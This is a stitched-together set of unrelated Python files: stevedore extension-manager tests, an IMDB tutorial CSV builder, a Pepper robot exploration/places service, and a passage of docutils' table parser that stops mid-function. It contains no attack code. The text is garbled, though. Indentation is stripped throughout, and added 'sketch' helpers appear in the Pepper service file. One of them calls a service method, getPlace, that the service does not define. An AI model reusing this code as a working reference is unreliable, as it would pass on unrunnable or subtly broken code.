self.assertEqual(test_extension, em[test_extension.name])
def test_manager_should_call(self):
em = ExtensionManager.make_test_instance([test_extension])
func = Mock()
em.map(func)
func.assert_called_once_with(test_extension)
def test_manager_should_call_all(self):
em = ExtensionManager.make_test_instance([test_extension2,
test_extension])
func = Mock()
em.map(func)
func.assert_any_call(test_extension2)
func.assert_any_call(test_extension)
def test_manager_return_values(self):
def mapped(ext, *args, **kwds):
return ext.name
em = ExtensionManager.make_test_instance([test_extension2,
test_extension])
results = em.map(mapped)
self.assertEqual(sorted(results), ['another_one', 'test_extension'])
def test_manager_should_eat_exceptions(self):
em = ExtensionManager.make_test_instance([test_extension])
func = Mock(side_effect=RuntimeError('hard coded error'))
results = em.map(func, 1, 2, a='A', b='B')
self.assertEqual(results, [])
def test_manager_should_propagate_exceptions(self):
em = ExtensionManager.make_test_instance([test_extension],
propagate_map_exceptions=True)
self.skipTest('Skipping temporarily')
func = Mock(side_effect=RuntimeError('hard coded error'))
em.map(func, 1, 2, a='A', b='B')
# NamedExtensionManager
def test_named_manager_should_use_supplied_extensions(self):
extensions = [test_extension, test_extension2]
em = NamedExtensionManager.make_test_instance(extensions)
self.assertEqual(extensions, em.extensions)
def test_named_manager_should_have_default_namespace(self):
em = NamedExtensionManager.make_test_instance([])
self.assertEqual(em.namespace, 'TESTING')
def test_named_manager_should_use_supplied_namespace(self):
namespace = 'testing.1.2.3'
em = NamedExtensionManager.make_test_instance([], namespace=namespace)
self.assertEqual(namespace, em.namespace)
def test_named_manager_should_populate_names(self):
extensions = [test_extension, test_extension2]
em = NamedExtensionManager.make_test_instance(extensions)
self.assertEqual(em.names(), ['test_extension', 'another_one'])
# HookManager
def test_hook_manager_should_use_supplied_extensions(self):
extensions = [test_extension, test_extension2]
em = HookManager.make_test_instance(extensions)
self.assertEqual(extensions, em.extensions)
def test_hook_manager_should_be_first_extension_name(self):
extensions = [test_extension, test_extension2]
em = HookManager.make_test_instance(extensions)
# This will raise KeyError if the names don't match
assert(em[test_extension.name])
def test_hook_manager_should_have_default_namespace(self):
em = HookManager.make_test_instance([test_extension])
self.assertEqual(em.namespace, 'TESTING')
def test_hook_manager_should_use_supplied_namespace(self):
namespace = 'testing.1.2.3'
em = HookManager.make_test_instance([test_extension],
namespace=namespace)
self.assertEqual(namespace, em.namespace)
def test_hook_manager_should_return_named_extensions(self):
hook1 = Extension('captain', None, None, None)
hook2 = Extension('captain', None, None, None)
em = HookManager.make_test_instance([hook1, hook2])
self.assertEqual([hook1, hook2], em['captain'])
# DriverManager
def test_driver_manager_should_use_supplied_extension(self):
em = DriverManager.make_test_instance(a_driver)
self.assertEqual([a_driver], em.extensions)
def test_driver_manager_should_have_default_namespace(self):
em = DriverManager.make_test_instance(a_driver)
self.assertEqual(em.namespace, 'TESTING')
def test_driver_manager_should_use_supplied_namespace(self):
namespace = 'testing.1.2.3'
em = DriverManager.make_test_instance(a_driver, namespace=namespace)
self.assertEqual(namespace, em.namespace)
def test_instance_should_use_driver_name(self):
em = DriverManager.make_test_instance(a_driver)
self.assertEqual(['test_driver'], em.names())
def test_instance_call(self):
def invoke(ext, *args, **kwds):
return ext.name, args, kwds
em = DriverManager.make_test_instance(a_driver)
result = em(invoke, 'a', b='C')
self.assertEqual(result, ('test_driver', ('a',), {'b': 'C'}))
def test_instance_driver_property(self):
em = DriverManager.make_test_instance(a_driver)
self.assertEqual(sentinel.driver_obj, em.driver)
# EnabledExtensionManager
def test_enabled_instance_should_use_supplied_extensions(self):
extensions = [test_extension, test_extension2]
em = EnabledExtensionManager.make_test_instance(extensions)
self.assertEqual(extensions, em.extensions)
# DispatchExtensionManager
def test_dispatch_instance_should_use_supplied_extensions(self):
extensions = [test_extension, test_extension2]
em = DispatchExtensionManager.make_test_instance(extensions)
self.assertEqual(extensions, em.extensions)
def test_dispatch_map_should_invoke_filter_for_extensions(self):
em = DispatchExtensionManager.make_test_instance([test_extension,
test_extension2])
filter_func = Mock(return_value=False)
args = ('A',)
kw = {'big': 'Cheese'}
em.map(filter_func, None, *args, **kw)
filter_func.assert_any_call(test_extension, *args, **kw)
filter_func.assert_any_call(test_extension2, *args, **kw)
# NameDispatchExtensionManager
def test_name_dispatch_instance_should_use_supplied_extensions(self):
extensions = [test_extension, test_extension2]
em = NameDispatchExtensionManager.make_test_instance(extensions)
self.assertEqual(extensions, em.extensions)
def test_name_dispatch_instance_should_build_extension_name_map(self):
extensions = [test_extension, test_extension2]
em = NameDispatchExtensionManager.make_test_instance(extensions)
self.assertEqual(test_extension, em.by_name[test_extension.name])
self.assertEqual(test_extension2, em.by_name[test_extension2.name])
def test_named_dispatch_map_should_invoke_filter_for_extensions(self):
em = NameDispatchExtensionManager.make_test_instance([test_extension,
test_extension2])
func = Mock()
args = ('A',)
kw = {'BIGGER': 'Cheese'}
em.map(['test_extension'], func, *args, **kw)
func.assert_called_once_with(test_extension, *args, **kw)
|
|
"""Build the tutorial data files from the IMDB *.list.gz files."""
import csv
import gzip
import os
import re
import sys
from datetime import datetime
split_on_tabs = re.compile(b'\t+').split
BAD_GENRES = {b'Adult', b'Documentary', b'Short', b'Horror', b'Reality-TV',
b'Talk-Show', b'Game-Show', b'Reality-tv'}
def main():
os.chdir(os.path.dirname(os.path.abspath(__file__)))
if not os.path.isdir('../data'):
os.makedirs('../data')
# Load movie titles.
titles = set()
uninteresting_titles = set()
lines = iter(gzip.open('genres.list.gz'))
line = next(lines)
while line != b'8: THE GENRES LIST\n':
line = next(lines)
assert next(lines) == b'==================\n'
assert next(lines) == b'\n'
print('Reading "genres.list.gz" to find interesting movies')
for line in lines:
if not_a_real_movie(line):
continue
fields = split_on_tabs(line.strip(b'\n'))
raw_title = fields[0]
genre = fields[1]
try:
raw_title.decode('ascii')
except UnicodeDecodeError:
continue
if genre in BAD_GENRES:
uninteresting_titles.add(raw_title)
else:
titles.add(raw_title)
interesting_titles = titles - uninteresting_titles
del titles
del uninteresting_titles
print('Found {0} titles'.format(len(interesting_titles)))
print('Writing "titles.csv"')
with open('../data/titles.csv', 'w') as f:
output = csv.writer(f)
output.writerow(('title', 'year'))
for raw_title in interesting_titles:
title_and_year = parse_title(raw_title)
output.writerow(title_and_year)
print('Finished writing "titles.csv"')
print('Reading release dates from "release-dates.list.gz"')
lines = iter(gzip.open('release-dates.list.gz'))
line = next(lines)
while line != b'RELEASE DATES LIST\n':
line = next(lines)
assert next(lines) == b'==================\n'
output = csv.writer(open('../data/release_dates.csv', 'w'))
output.writerow(('title', 'year', 'country', 'date'))
for line in lines:
if not_a_real_movie(line):
continue
if line.startswith(b'----'):
continue
fields = split_on_tabs(line.strip(b'\n'))
if len(fields) > 2: # ignore "DVD premiere" lines and so forth
continue
raw_title = fields[0]
if raw_title not in interesting_titles:
continue
title, year = parse_title(raw_title)
if title is None:
continue
country, datestr = fields[1].decode('ascii').split(':')
try:
date = datetime.strptime(datestr, '%d %B %Y').date()
except ValueError:
continue # incomplete dates like "April 2014"
output.writerow((title, year, country, date))
print('Finished writing "release_dates.csv"')
if sys.version_info < (3, 0):
output = csv.writer(open('../data/cast.csv', 'w'))
else:
output = csv.writer(open('../data/cast.csv', 'w', encoding='utf-8'))
output.writerow(('title', 'year', 'name', 'type', 'character', 'n'))
for role_type, filename in (
('actor', 'actors.list.gz'),
('actress', 'actresses.list.gz'),
):
print('Reading {0!r}'.format(filename))
lines = iter(gzip.open(filename))
line = next(lines)
while (b'Name' not in line) or (b'Titles' not in line):
line = next(lines)
assert b'----' in next(lines)
for line in lines:
if line.startswith(b'----------------------'):
break
line = line.rstrip()
if not line:
continue
fields = split_on_tabs(line.strip(b'\n'))
if fields[0]:
name = decode_ascii(fields[0])
name = swap_names(name)
if len(fields) < 2:
raise ValueError('broken line: {!r}'.format(line))
if not_a_real_movie(fields[1]):
continue
fields = fields[1].split(b' ')
raw_title = fields[0]
if raw_title not in interesting_titles:
continue
if len(fields) < 2:
continue
if fields[1].startswith(b'('): # uncredited, archive footage, etc
del fields[1]
if len(fields) < 2:
continue
if not fields[1].startswith(b'['):
continue
character = decode_ascii(fields[1].strip(b'[]'))
if len(fields) > 2 and fields[2].startswith(b'<'):
n = int(fields[2].strip(b'<>'))
else:
n = ''
title, year = parse_title(raw_title)
if title is None:
continue
if character == 'N/A':
clist = ['(N/A)']
else:
clist = character.split('/')
for character in clist:
if not character:
continue
output.writerow((title, year, name, role_type, character, n))
print('Finished writing "cast.csv"')
def not_a_real_movie(line):
return (
line.startswith(b'"') # TV show
or b'{' in line # TV episode
or b' (????' in line # Unknown year
or b' (TV)' in line # TV Movie
or b' (V)' in line # Video
or b' (VG)' in line # Video game
or b' (segment ' in line # Anthology film
)
match_title = re.compile(r'^(.*) \((\d+)(/[IVXL]+)?\)$').match
def parse_title(raw_title):
try:
title = raw_title.decode('ascii')
except UnicodeDecodeError:
return None, None
m = match_title(title)
title = m.group(1)
year = int(m.group(2))
numeral = m.group(3)
if numeral is not None:
numeral = numeral.strip('/')
if numeral != 'I':
title = '{0} ({1})'.format(title, numeral)
return title, year
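# Illustrative examples (assumed inputs, derived from the regex above):
#   b'Blade Runner (1982)' -> ('Blade Runner', 1982)
#   b'Solaris (1972/II)'   -> ('Solaris (II)', 1972)  # a Roman numeral other than I is kept in the title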
def swap_names(name):
if name.endswith(' (I)'):
name = name[:-4]
if ',' in name:
last, first = name.split(',', 1)
name = first.strip() + ' ' + last.strip()
return name
def decode_ascii(s):
return s.decode('latin-1')  # previously: s.decode('ascii', 'replace').replace(u'\ufffd', u'?')
if __name__ == '__main__':
main()
|
|
import qi
import os
import time
import cv2
import numpy as np
import almath as m
import base64
import sys
try:
import cPickle as pickle
except:
import pickle
try:
from almath import OccupancyMapParams
from almath import Point2Di
except:
class Point2Di:
def __init__(self, x, y):
self.x = x
self.y = y
class OccupancyMapParams:
def __init__(self, size, metersPerPixel, originOffset):
self.size = size
self.metersPerPixel = metersPerPixel
# Metric coordinates of the (0, 0) pixel.
self.originOffset = m.Position2D(0, 0)
self.originOffset.x = originOffset.x
self.originOffset.y = originOffset.y
def getPositionFromPixel(self, pixel):
return m.Position2D(pixel.x * self.metersPerPixel + self.originOffset.x, -pixel.y * self.metersPerPixel + self.originOffset.y)
def getPixelFromPosition(self, position):
return m.Position2D((position.x - self.originOffset.x) / self.metersPerPixel, (self.originOffset.y - position.y) / self.metersPerPixel)
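# Illustrative round-trip with assumed values: with metersPerPixel=0.05 and originOffset=(-10.0, 10.0),
# getPositionFromPixel(Point2Di(200, 200)) gives (0.0, 0.0), and getPixelFromPosition of that
# position gives back pixel (200.0, 200.0).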
@qi.multiThreaded()
class EventHelper:
def __init__(self, memory, subscribers):
self.subscribers = subscribers
self.memory = memory
self.serviceName = "EventHelper"
self.subscribeToggle = False
self.connectSubscribers()
@qi.bind()
def connectSubscribers(self):
""" generate & connect all subscribers to callbacks """
if not self.subscribeToggle:
for event in self.subscribers.keys():
self.subscribers[event]["subscriber"] = self.memory.subscriber(event)
self.subscribers[event]["uid"] = self.subscribers[event]["subscriber"].signal.connect(self.subscribers[event]["callback"])
self.subscribeToggle = True
@qi.bind()
def disconnectSubscribers(self):
""" disconnect all subscribers from callbacks """
qi.info(self.serviceName, "DISCONNECTING SUBSCRIBERS")
if self.subscribeToggle:
for event in self.subscribers.keys():
future = qi.async(self.disconnectSubscriber, event, delay = 0)
future.wait(1000) # add a timeout to avoid deadlock
if not future.isFinished():
qi.error(self.serviceName, "disconnectSubscribers", "Failed disconnecting %s subscribers" % event)
self.subscribeToggle = False
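@qi.bind()
def disconnectSubscriber(self, event):
""" disconnect a single subscriber from its callback.
Sketch of the helper assumed by disconnectSubscribers above, mirroring the connect logic
in connectSubscribers; the uid returned by signal.connect is passed back to signal.disconnect. """
self.subscribers[event]["subscriber"].signal.disconnect(self.subscribers[event]["uid"])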
class ExplorationManager:
def __new__(cls, session):
return super(ExplorationManager, cls).__new__(cls)
def __init__(self, session):
self.session = session
self.nav = self.session.service("ALNavigation")
self.tabletService = self.session.service("ALTabletService")
self.memory = self.session.service("ALMemory")
self.application_name = "ExplorationManager"
self.explorer_application_name = "Explorer"
self.current_places = None
self.logger = qi.Logger("ExplorationManager")
self.explo_extension = ".explo"
self.places_extension = ".places"
self.packageUid = "exploration-manager"
self.subscribers = {
"Places/LoadPlaces": {"callback": self.loadPlaces},
"Places/Save": {"callback": self.savePlacesCallback},
"Places/AddPlace": {"callback": self.addPlaceCallback},
"Places/Reset": {"callback":self.resetPlacesCallback}
}
self.events = {"metricalMap": "ExplorationManager/MetricalMap",
"places": "ExplorationManager/Places"}
self.eventHelper = EventHelper(self.memory, self.subscribers)
def isExplorationLoaded(self):
try:
self.nav.getExplorationPath()
places_loaded = "name" in self.current_places and "places" in self.current_places
except:
return False
return places_loaded
def isLocalized(self):
try:
self.nav.getRobotPositionInMap()
return True
except:
return False
def getPlaces(self):
if self.current_places is None:
self.logger.warning("No places loaded")
return None
return self.current_places["places"]
def getPlaceLocation(self, label):
if self.current_places is None:
self.logger.warning("No places loaded")
return None
if label in self.current_places["places"]:
return self.current_places["places"][label]
return None
def resetPlacesCallback(self, useless):
self.resetPlaces()
def resetPlaces(self):
self.current_places["places"] = {}
self.publishLabels()
def loadExploration(self, name):
explo_path = qi.path.findData(self.explorer_application_name, name + self.explo_extension, False)
if len(explo_path) > 0:
try:
if not(self.nav.loadExploration(explo_path)):
return False
self.current_places = {}
self.current_places["name"] = name
self.current_places["places"] = {}
except Exception as e:
self.logger.error("Unable to load explo: " + str(e))
return False
return True
self.logger.error("No such explo file: " + name)
return False
def loadPlaces(self, name):
self.logger.info("load places")
available_explo = qi.path.findData(self.application_name, name + self.places_extension, False)
if len(available_explo) > 0:
#load an existing annotated explo
in_file = open(available_explo, "rb")
data = pickle.load(in_file)
in_file.close()
if not("name" in data) or not("places" in data):
self.logger.error("wrong annoted explo format")
return False
self.current_places = data
explo_path = qi.path.findData(self.explorer_application_name, name + self.explo_extension, False)
if len(explo_path) > 0:
try:
self.nav.loadExploration(explo_path)
except Exception as e:
self.logger.warning("Unable to load places: " + str(e))
return False
else:
return False
elif not(self.loadExploration(name)):
return False
self.showPlaces()
return True
def savePlacesCallback(self, useless):
self.savePlaces()
def savePlaces(self):
if self.current_places is None:
self.logger.warning("No places loaded")
return None
path = qi.path.userWritableDataPath(self.application_name, self.current_places["name"] + self.places_extension)
out_file = open(path, "wb")
self.logger.info("places to save: " + str(self.current_places))
pickle.dump(self.current_places, out_file)
out_file.close()
self.logger.info("places saved to : " + path)
return path
def getAvailableExplorations(self):
data = qi.path.listData(self.explorer_application_name, "*" + self.explo_extension)
return self.getBasenameList(data)
def getAvailablePlaces(self):
data = qi.path.listData(self.application_name, "*" + self.places_extension)
return self.getBasenameList(data)
def getBasenameList(self, data):
result = []
for path in data:
basename = os.path.basename(path)
result.append(os.path.splitext(basename)[0])  # strip the extension; ".explo" and ".places" differ in length
return result
def addPlaceCallback(self, place):
pt = self.occMap.getPositionFromPixel(Point2Di(place[0][0], place[0][1]))
label = place[1]
self.addPlace(label, [pt.x, pt.y])
def addPlace(self, label, position):
if self.current_places is None:
self.logger.warning("No places loaded")
return None
self.logger.info("adding " + label)
self.current_places["places"][label] = position
self.publishLabels()
def showWebPage(self):
appName = self.packageUid
if self.tabletService.loadApplication(appName):
self.logger.info("Successfully set application: %s" % appName)
self.tabletService.showWebview()
time.sleep(4)
return True
else:
self.logger.warning("Got tablet service, but failed to set application: %s" % appName)
return False
def publishLabels(self):
if self.current_places is None:
self.logger.warning("No places loaded")
return None
place_list = []
for place in self.current_places["places"]:
current_place = self.current_places["places"][place]
pos = self.occMap.getPixelFromPosition(m.Position2D(current_place[0], current_place[1]))
place_list.append([[pos.x, pos.y], place])
self.memory.raiseEvent(self.events["places"], place_list)
def showPlaces(self):
self.publishMap()
self.publishLabels()
def publishMap(self):
if self.current_places == None:
self.logger.warning("No places loaded")
return None
# Get the map from navigation.
map = self.nav.getMetricalMap()
mpp = map[0]
size = map[1]
originOffset = m.Position2D(map[3])
data = map[4]
# Fit the size of the image
img = np.array(data, np.uint8).reshape(size, size, 1)
img = (100 - img) * 2.5
img = img.transpose((1, 0, 2)) # Do not transpose the channels.
tabletSize = 736
img = cv2.resize(img, (tabletSize, tabletSize))
mpp = size * mpp / tabletSize
size = tabletSize
#convert to color
cv_img = img.astype(np.uint8)
color_img = cv2.cvtColor(cv_img, cv2.COLOR_GRAY2RGB)
self.occMap = OccupancyMapParams(size, mpp, originOffset)
self.occMap.originOffset = originOffset
# png
flag, buff = cv2.imencode(".png", color_img)
# base 64
buff64 = base64.b64encode(buff)
full = "data:image/png;base64," + buff64
# show app
self.memory.raiseEvent(self.events["metricalMap"], [mpp, size, map[3], full])
def getOccupancyMapParams(self):
return [self.occMap.size, self.occMap.metersPerPixel, self.occMap.originOffset.toVector()]
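# Illustrative sketch (not part of the original service): the core of the
# publishMap() pipeline above, reduced to a standalone helper. It assumes a
# square occupancy grid of size x size cells with values in 0..100, as returned
# by ALNavigation.getMetricalMap(), and returns a PNG data URI plus the rescaled
# meters-per-pixel value (each tablet pixel covers size * mpp / tablet_size meters).
def _map_to_data_uri_sketch(data, size, mpp, tablet_size=736):
    import base64
    import cv2
    import numpy as np
    # Reshape the flat occupancy data into an image and stretch the contrast.
    img = np.array(data, np.uint8).reshape(size, size, 1)
    img = (100 - img) * 2.5
    img = img.transpose((1, 0, 2))  # swap x/y only, keep the channel axis
    # Resize for the tablet and rescale meters-per-pixel to match.
    img = cv2.resize(img.astype(np.uint8), (tablet_size, tablet_size))
    new_mpp = size * mpp / tablet_size
    color_img = cv2.cvtColor(img, cv2.COLOR_GRAY2RGB)
    ok, buff = cv2.imencode(".png", color_img)
    uri = "data:image/png;base64," + base64.b64encode(buff).decode("ascii")
    return uri, new_mpp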
if __name__ == "__main__":
app = qi.Application(sys.argv)
app.start()
session = app.session
#get the logs
mod = qi.module("qicore")
provider = mod.initializeLogging(app.session)
# don't forget to check that the services you use are ready!
for required_service in ["ALMemory", "ALNavigation", "ALTabletService"]:
future = session.waitForService(required_service)
if future is not None:
future.wait()
my_service = ExplorationManager(session)
register_id = session.registerService("ExplorationManager", my_service)
app.run()
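# Usage sketch (hypothetical, not part of the original file): how another qi
# client could drive the registered "ExplorationManager" service. The robot URL
# and the place coordinates are illustrative assumptions.
def _exploration_manager_client_sketch(url="tcp://127.0.0.1:9559"):
    import qi
    session = qi.Session()
    session.connect(url)
    explo = session.service("ExplorationManager")
    explo.loadPlaces("office")             # load an annotated exploration
    explo.addPlace("kitchen", [1.5, 0.2])  # world coordinates, in meters
    explo.savePlaces()
    return explo.getPlace("kitchen")       # -> [1.5, 0.2]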
|
|
# $Id: tableparser.py 7320 2012-01-19 22:33:02Z milde $
# Author: David Goodger <goodger@python.org>
# Copyright: This module has been placed in the public domain.
"""
This module defines table parser classes, which parse plaintext-graphic tables
and produce a well-formed data structure suitable for building a CALS table.
:Classes:
- `GridTableParser`: Parse fully-formed tables represented with a grid.
- `SimpleTableParser`: Parse simple tables, delimited by top & bottom
borders.
:Exception class: `TableMarkupError`
:Function:
`update_dict_of_lists()`: Merge two dictionaries containing list values.
"""
__docformat__ = 'reStructuredText'
import re
import sys
from docutils import DataError
from docutils.utils import strip_combining_chars
class TableMarkupError(DataError):
"""
Raise if there is any problem with table markup.
The keyword argument `offset` denotes the offset of the problem
from the table's start line.
"""
def __init__(self, *args, **kwargs):
self.offset = kwargs.pop('offset', 0)
DataError.__init__(self, *args)
class TableParser:
"""
Abstract superclass for the common parts of the syntax-specific parsers.
"""
head_body_separator_pat = None
"""Matches the row separator between head rows and body rows."""
double_width_pad_char = '\x00'
"""Padding character for East Asian double-width text."""
def parse(self, block):
"""
Analyze the text `block` and return a table data structure.
Given a plaintext-graphic table in `block` (list of lines of text; no
whitespace padding), parse the table, construct and return the data
necessary to construct a CALS table or equivalent.
Raise `TableMarkupError` if there is any problem with the markup.
"""
self.setup(block)
self.find_head_body_sep()
self.parse_table()
structure = self.structure_from_cells()
return structure
def find_head_body_sep(self):
"""Look for a head/body row separator line; store the line index."""
for i in range(len(self.block)):
line = self.block[i]
if self.head_body_separator_pat.match(line):
if self.head_body_sep:
raise TableMarkupError(
'Multiple head/body row separators '
'(table lines %s and %s); only one allowed.'
% (self.head_body_sep+1, i+1), offset=i)
else:
self.head_body_sep = i
self.block[i] = line.replace('=', '-')
if self.head_body_sep == 0 or self.head_body_sep == (len(self.block)
- 1):
raise TableMarkupError('The head/body row separator may not be '
'the first or last line of the table.',
offset=i)
class GridTableParser(TableParser):
"""
Parse a grid table using `parse()`.
Here's an example of a grid table::
+------------------------+------------+----------+----------+
| Header row, column 1 | Header 2 | Header 3 | Header 4 |
+========================+============+==========+==========+
| body row 1, column 1 | column 2 | column 3 | column 4 |
+------------------------+------------+----------+----------+
| body row 2 | Cells may span columns. |
+------------------------+------------+---------------------+
| body row 3 | Cells may | - Table cells |
+------------------------+ span rows. | - contain |
| body row 4 | | - body elements. |
+------------------------+------------+---------------------+
Intersections use '+', row separators use '-' (except for one optional
head/body row separator, which uses '='), and column separators use '|'.
Passing the above table to the `parse()` method will result in the
following data structure::
([24, 12, 10, 10],
[[(0, 0, 1, ['Header row, column 1']),
(0, 0, 1, ['Header 2']),
(0, 0, 1, ['Header 3']),
(0, 0, 1, ['Header 4'])]],
[[(0, 0, 3, ['body row 1, column 1']),
(0, 0, 3, ['column 2']),
(0, 0, 3, ['column 3']),
(0, 0, 3, ['column 4'])],
[(0, 0, 5, ['body row 2']),
(0, 2, 5, ['Cells may span columns.']),
None,
None],
[(0, 0, 7, ['body row 3']),
(1, 0, 7, ['Cells may', 'span rows.', '']),
(1, 1, 7, ['- Table cells', '- contain', '- body elements.']),
None],
[(0, 0, 9, ['body row 4']), None, None, None]])
The first item is a list containing column widths (colspecs). The second
item is a list of head rows, and the third is a list of body rows. Each
row contains a list of cells. Each cell is either None (for a cell unused
because of another cell's span), or a tuple. A cell tuple contains four
items: the number of extra rows used by the cell in a vertical span
(morerows); the number of extra columns used by the cell in a horizontal
span (morecols); the line offset of the first line of the cell contents;
and the cell contents, a list of lines of text.
"""
head_body_separator_pat = re.compile(r'\+=[=+]+=\+ *$')
def setup(self, block):
self.block = block[:] # make a copy; it may be modified
self.block.disconnect() # don't propagate changes to parent
self.bottom = len(block) - 1
self.right = len(block[0]) - 1
self.head_body_sep = None
self.done = [-1] * len(block[0])
self.cells = []
self.rowseps = {0: [0]}
self.colseps = {0: [0]}
def parse_table(self):
"""
Start with a queue of upper-left corners, containing the upper-left
corner of the table itself. Trace out one rectangular cell, remember
it, and add its upper-right and lower-left corners to the queue of
potential upper-left corners of further cells. Process the queue in
top-to-bottom order, keeping track of how much of each text column has
been seen.
We'll end up knowing all the row and column boundaries, cell positions
and their dimensions.
"""
corners = [(0, 0)]
while corners:
top, left = corners.pop(0)
if top == self.bottom or left == self.right \
or top <= self.done[left]:
continue
result = self.scan_cell(top, left)
if not result:
continue
bottom, right, rowseps, colseps = result
update_dict_of_lists(self.rowseps, rowseps)
update_dict_of_lists(self.colseps, colseps)
self.mark_done(top, left, bottom, right)
cellblock = self.block.get_2D_block(top + 1, left + 1,
bottom, right)
cellblock.disconnect() # lines in cell can't sync with parent
cellblock.replace(self.double_width_pad_char, '')
self.cells.append((top, left, bottom, right, cellblock))
corners.extend([(top, right), (bottom, left)])
corners.sort()
if not self.check_parse_complete():
raise TableMarkupError('Malformed table; parse incomplete.')
def mark_done(self, top, left, bottom, right):
"""For keeping track of how much of each text column has been seen."""
before = top - 1
after = bottom - 1
for col in range(left, right):
assert self.done[col] == before
self.done[col] = after
def check_parse_complete(self):
"""Each text column should have been completely seen."""
last = self.bottom - 1
for col in range(self.right):
if self.done[col] != last:
return False
return True
def scan_cell(self, top, left):
"""Starting at the top-left corner, start tracing out a cell."""
assert self.block[top][left] == '+'
result = self.scan_right(top, left)
return result
def scan_right(self, top, left):
"""
Look for the top-right corner of the cell, and make note of all column
boundaries ('+').
"""
colseps = {}
line = self.block[top]
for i in range(left + 1, self.right + 1):
if line[i] == '+':
colseps[i] = [top]
result = self.scan_down(top, left, i)
if result:
bottom, rowseps, newcolseps = result
update_dict_of_lists(colseps, newcolseps)
return bottom, i, rowseps, colseps
elif line[i] != '-':
return None
return None
def scan_down(self, top, left, right):
"""
Look for the bottom-right corner of the cell, making note of all row
boundaries.
"""
rowseps = {}
for i in range(top + 1, self.bottom + 1):
if self.block[i][right] == '+':
rowseps[i] = [right]
result = self.scan_left(top, left, i, right)
if result:
newrowseps, colseps = result
update_dict_of_lists(rowseps, newrowseps)
return i, rowseps, colseps
elif self.block[i][right] != '|':
return None
return None
def scan_left(self, top, left, bottom, right):
"""
Noting column boundaries, look for the bottom-left corner of the cell.
It must line up with the starting point.
"""
colseps = {}
line = self.block[bottom]
for i in range(right - 1, left, -1):
if line[i] == '+':
colseps[i] = [bottom]
elif line[i] != '-':
return None
if line[left] != '+':
return None
result = self.scan_up(top, left, bottom, right)
if result is not None:
rowseps = result
return rowseps, colseps
return None
def scan_up(self, top, left, bottom, right):
"""
Noting row boundaries, see if we can return to the starting point.
"""
rowseps = {}
for i in range(bottom - 1, top, -1):
if self.block[i][left] == '+':
rowseps[i] = [left]
elif self.block[i][left] != '|':
return None
return rowseps
def structure_from_cells(self):
"""
From the data collected by `scan_cell()`, convert to the final data
structure.
"""
rowseps = list(self.rowseps.keys()) # list of row boundaries
rowseps.sort()
rowindex = {}
for i in range(len(rowseps)):
rowindex[rowseps[i]] = i # row boundary -> row number mapping
colseps = list(self.colseps.keys()) # list of column boundaries
colseps.sort()
colindex = {}
for i in range(len(colseps)):
colindex[colseps[i]] = i # column boundary -> col number map
colspecs = [(colseps[i] - colseps[i - 1] - 1)
for i in range(1, len(colseps))] # list of column widths
# prepare an empty table with the correct number of rows & columns
onerow = [None for i in range(len(colseps) - 1)]
rows = [onerow[:] for i in range(len(rowseps) - 1)]
# keep track of # of cells remaining; should reduce to zero
remaining = (len(rowseps) - 1) * (len(colseps) - 1)
for top, left, bottom, right, block in self.cells:
rownum = rowindex[top]
colnum = colindex[left]
assert rows[rownum][colnum] is None, (
'Cell (row %s, column %s) already used.'
% (rownum + 1, colnum + 1))
morerows = rowindex[bottom] - rownum - 1
morecols = colindex[right] - colnum - 1
remaining -= (morerows + 1) * (morecols + 1)
# write the cell into the table
rows[rownum][colnum] = (morerows, morecols, top + 1, block)
assert remaining == 0, 'Unused cells remaining.'
if self.head_body_sep: # separate head rows from body rows
numheadrows = rowindex[self.head_body_sep]
headrows = rows[:numheadrows]
bodyrows = rows[numheadrows:]
else:
headrows = []
bodyrows = rows
return (colspecs, headrows, bodyrows)
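# Usage sketch (illustrative, not part of the original module): GridTableParser
# operates on a docutils StringList (parse() calls .disconnect() and
# .get_2D_block() on it), not on a plain list of strings. The table text below
# is an assumption chosen for the demo.
def _grid_table_demo():
    from docutils.statemachine import StringList
    lines = ['+-----+-----+',
             '| a   | b   |',
             '+=====+=====+',
             '| 1   | 2   |',
             '+-----+-----+']
    colspecs, headrows, bodyrows = GridTableParser().parse(StringList(lines))
    # colspecs -> [5, 5]; one head row ('a', 'b') and one body row ('1', '2')
    return colspecs, headrows, bodyrows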
class SimpleTableParser(TableParser):
"""
Parse a simple table using `parse()`.
Here's an example of a simple table::
===== =====
col 1 col 2
===== =====
1 Second column of row 1.
2 Second column of row 2.
Second line of paragraph.
3 - Second column of row 3.
- Second item in bullet
list (row 3, column 2).
4 is a span
------------
5
===== =====
Top and bottom borders use '=', column span underlines use '-', column
separation is indicated with spaces.
Passing the above table to the `parse()` method will result in the
following data structure, whose interpretation is the same as for
`GridTableParser`::
([5, 25],
[[(0, 0, 1, ['col 1']),
(0, 0, 1, ['col 2'])]],
[[(0, 0, 3, ['1']),
(0, 0, 3, ['Second column of row 1.'])],
[(0, 0, 4, ['2']),
(0, 0, 4, ['Second column of row 2.',
'Second line of paragraph.'])],
[(0, 0, 6, ['3']),
(0, 0, 6, ['- Second column of row 3.',
'',
'- Second item in bullet',
' list (row 3, column 2).'])],
[(0, 1, 10, ['4 is a span'])],
[(0, 0, 12, ['5']),
(0, 0, 12, [''])]])
"""
head_body_separator_pat = re.compile('=[ =]*$')
span_pat = re.compile('-[ -]*$')
def setup(self, block):
self.block = block[:] # make a copy; it will be modified
self.block.disconnect() # don't propagate changes to parent
# Convert top & bottom borders to column span underlines:
self.block[0] = self.block[0].replace('=', '-')
self.block[-1] = self.block[-1].replace('=', '-')
self.head_body_sep = None
self.columns = []
self.border_end = None
self.table = []
self.done = [-1] * len(block[0])
self.rowseps = {0: [0]}
self.colseps = {0: [0]}
def parse_table(self):
"""
First determine the column boundaries from the top border, then
process rows. Each row may consist of multiple lines; accumulate
lines until a row is complete. Call `self.parse_row` to finish the
job.
"""
# Top border must fully describe all table columns.
self.columns = self.parse_columns(self.block[0], 0)
self.border_end = self.columns[-1][1]
firststart, firstend = self.columns[0]
offset = 1 # skip top border
start = 1
text_found = None
while offset < len(self.block):
line = self.block[offset]
if self.span_pat.match(line):
# Column span underline or border; row is complete.
self.parse_row(self.block[start:offset], start,
(line.rstrip(), offset))
start = offset + 1
text_found = None
elif line[firststart:firstend].strip():
# First column not blank, therefore it's a new row.
if text_found and offset != start:
self.parse_row(self.block[start:offset], start)
start = offset
text_found = 1
elif not text_found:
start = offset + 1
offset += 1
def parse_columns(self, line, offset):
"""
Given a column span underline, return a list of (begin, end) pairs.
"""
cols = []
end = 0
while True:
begin = line.find('-', end)
end = line.find(' ', begin)
if begin < 0:
break
if end < 0:
end = len(line)
cols.append((begin, end))
if self.columns:
if cols[-1][1] != self.border_end:
raise TableMarkupError('Column span incomplete in table '
'line %s.' % (offset+1),
offset=offset)
